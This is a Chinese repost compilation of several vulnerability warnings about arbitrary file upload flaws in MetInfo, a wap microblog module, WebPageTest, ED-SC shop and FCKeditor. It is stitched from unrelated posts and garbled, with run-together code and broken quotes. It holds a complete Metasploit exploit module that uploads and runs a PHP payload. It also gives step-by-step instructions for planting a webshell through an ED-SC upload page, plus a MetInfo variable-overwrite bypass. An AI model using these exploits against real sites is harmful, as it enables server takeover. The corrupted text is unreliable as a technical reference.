以下是小编为大家收集的eWebeditoR3.8 for php任意文件上传EXP漏洞预警(共含5篇),希望能够帮助到大家。同时,但愿您也能像本文投稿人“栖诚”一样,积极向本站投稿分享好文章。
MetInfo 23号发布了新版本5.1.5,修补了本文提到的漏洞,当然严格来说应该是任意变量覆盖漏洞....
ps:欢迎各种形式,首发t00ls.net
注:请勿利用本文内容从事一切非法活动,否则后果自负
author:my5t3ry
废话不多说,看代码:
includecommon.inc.php20-39$db_settings=parse_ini_file(ROOTPATH.'config/config_db.php');@extract($db_settings);require_once ROOTPATH.'include/mysql_class.php';$db=newdbmysql;$db->dbconn($con_db_host,$con_db_id,$con_db_pass,$con_db_name);define('MAGIC_QUOTES_GPC',get_magic_quotes_gpc());isset($_REQUEST['GLOBALS'])&&exit('Access Error');require_once ROOTPATH.'include/global.func.php';foreach(array('_COOKIE','_POST','_GET')as$_request){foreach($$_requestas$_key=>$_value){$_key{0}!='_'&&$$_key=daddslashes($_value);}}$query=“select * from {$tablepre}config where name='met_tablename' and lang='metinfo'”;$mettable=$db->get_one($query);$mettables=explode('|',$mettable[value]);foreach($mettablesas$key=>$val){$tablename='met_'.$val;$$tablename=$tablepre.$val;}
metinfo系统通过查询数据库的{$tablepre}config表,并将获取的结果通过foreach循环初始化表名变量,其中的
是通过代码
$db_settings = parse_ini_file(ROOTPATH.'config/config_db.php'); @extract($db_settings);
来初始化的,然后在系统中使用这样“SELECT * FROM $met_message where id=$id and lang='$lang'”的SQL查询数据库,
其中的$met_message变量就是前面foreach循环初始化的变量……
我们可以覆盖$tablepre变量使表名初始化失败,进而提交表名变量.....
我找了个后台的上传页面,通过覆盖变量绕过后台验证并且覆盖允许上传后缀列表,构造上传漏洞,
MetInfov5.1.3 任意文件上传漏洞漏洞预警
,
exp:任意文件上传
任意文件上传
某模块未对上传文件类型进行验证,可上传任意文件
代码产生位置
appswapLibActionIndexAction.class.php
263行
if(!empty($_FILES['pic']['name'])) { // 自动发一条图片微博
$data['pic'] = $_FILES['pic'];
$data['content'] = '图片分享';
$data['from'] = $this->_type_wap;
$res = api('Statuses')->data($data)->upload();
}
未对文件类型过滤
访问wap 模块
发一条微博并传图
firebug 地址
去掉small_然后访问
www.myhack58.com/data/uploads//1023/17/50865d481c217.php
修复方案:
对上传类型要进行检查
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => “WebPageTest Arbitrary PHP File Upload”,
'Description' => %q{
This module exploits a vulnerability found in WebPageTest's Upload Feature. By
default, the resultimage.phpfile does not verify the user-supplied item before
saving it to disk, and then places this item in the web directory accessable by
remote users. This flaw can be abused to gain remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'dun', #Discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '83822'],
['EDB', '19790']
],
'Payload' =>
{
'BadChars' => “x00”
},
'DefaultOptions' =>
{
'ExitFunction' => “none”
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['WebPageTest v2.6 or older', {}]
],
'Privileged' => false,
'DisclosureDate' => “Jul 13 2012”,
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])
], self.class)
end
def check
peer = “#{rhost}:#{rport}”
target_uri.path << '/' if target_uri.path[-1,1] != '/'
base = File.dirname(“#{target_uri.path}.”)
res1 = send_request_raw({'uri'=>“#{base}/index.php”})
res2 = send_request_raw({'uri'=>“#{base}/work/resultimage.php”})
if res1 and res1.body =~ /WebPagetest - Website Performance and Optimization Test/ and
res2 and res2.code == 200
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def on_new_session(cli)
if cli.type != “meterpreter”
print_error(“No automatic cleanup for you. Please manually remove: #{@target_path}”)
return
end
cli.core.use(“stdapi”) if not cli.ext.aliases.include?(“stdapi”)
cli.fs.file.rm(@target_path)
print_status(“#{@target_path} removed”)
end
def exploit
peer = “#{rhost}:#{rport}”
target_uri.path << '/' if target_uri.path[-1,1] != '/'
base = File.dirname(“#{target_uri.path}.”)
p = payload.encoded
fname = “blah.php”
data = Rex::MIME::Message.new
data.add_part(
“
'multipart/form-data', #Content Type
nil, #Transfer Encoding
”form-data; name=“file”; filename=“#{fname}”“ #Content Disposition
)
print_status(”#{peer} - Uploading payload (#{p.length.to_s} bytes)...“)
res = send_request_cgi({
'method' => 'POST',
'uri' => ”#{base}/work/resultimage.php“,
'ctype' => ”multipart/form-data; boundary=#{data.bound}“,
'data' => data.to_s
})
if not res
print_error(”#{peer} - No response from host“)
return
end www.xxxxo.com
@target_path = ”#{base}/results/#{fname}“
print_status(”#{peer} - Requesting #{@target_path}“)
res = send_request_cgi({'uri'=>@target_path})
handler
if res and res.code == 404
print_error(”#{peer} - Payload failed to upload")
end
end
end
这个漏洞很久了,可是在网上找了找还没有发现有人提及过,所以还是公布出来和大家分享一下.
本人不是程序员,所以代码方面没有办法讲解,请见谅!
网上商城ED-SC V2.1
默认后台路径www.xxx.com/admins
默认上传路径www.xxx.com/admins/upfile_flash.asp
还有N多默认,但是有这两个就足够了,甚至可以说找到/upfile_flash.asp的路径就可以了,
网上商城EDSC V2.1 任意文件上传漏洞漏洞预警
,
利用过程写一下吧,要不很多和我一样菜的朋友看不懂
既然是上传漏洞当然少不了明小子出场.
直接用明小子上传就可以了
上传路径www.xxx.com/admins/upfile_flash.asp
提示已经上传,接者访问马儿地址www.xxx.com/admins/diy.asp
FCKeditor 2.6.8
BUGTRAQ ID: 56735FCKeditor是一款开放源码的HTML文本编辑器,
FCKEditor FileUpload()函数任意文件上传漏洞漏洞预警
。FCKEditor 2.6.8及其他版本在'FileUpload()'函数的实现上存在安全漏洞,攻击者可利用此漏洞上传任意文件到受影响计算机,<* 参考Mostafa Azizi*>
厂商补丁:FCKeditor---------目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:www.fckeditor.net/
★ SKCMS存在任意文件上传漏洞可直接getshell漏洞预警
★ dedecms 5.7 edit.inc.php文件注射漏洞预警
★ shopxp pinglun.asp文件SQL注入漏洞分析漏洞预警
